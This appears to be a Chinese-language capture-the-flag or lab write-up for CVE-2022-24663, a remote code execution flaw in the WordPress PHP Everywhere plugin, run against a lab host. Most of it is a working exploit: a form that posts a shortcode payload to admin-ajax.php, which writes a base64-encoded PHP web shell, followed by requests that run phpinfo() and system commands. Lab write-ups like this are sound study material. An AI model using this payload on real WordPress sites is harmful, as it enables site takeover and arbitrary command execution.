banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

CVE-2022-24663

image

產品簡介#

WordPress 是一款個人部落格系統,並逐步演化成一款內容管理系統軟體,它是使用 PHP 語言和 MySQL 資料庫開發的,使用者可以在支援 PHP 和 MySQL 資料庫的伺服器上使用自己的部落格。

漏洞概述#

任何訂閱者都可以利用該漏洞傳送帶有「短碼」參數設定為 PHP Everywhere 的請求,並在網站上執行任意 PHP 程式碼。

影響範圍#

<= 2.0.3
影響外掛:PHP Everywhere

利用流程#

訪問後台地址:

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin

帳號:test/test

刪除儀表板下方的內容,瀏覽器 F12,添加一個節點,輸入如下內容:

<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>

然後執行即可(點擊 execute),訪問如下連結:

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php

頁面返回 200.

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);

修復建議#

  • 升級版本

參考#

NVD - CVE-2022-24663

圖片來自

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。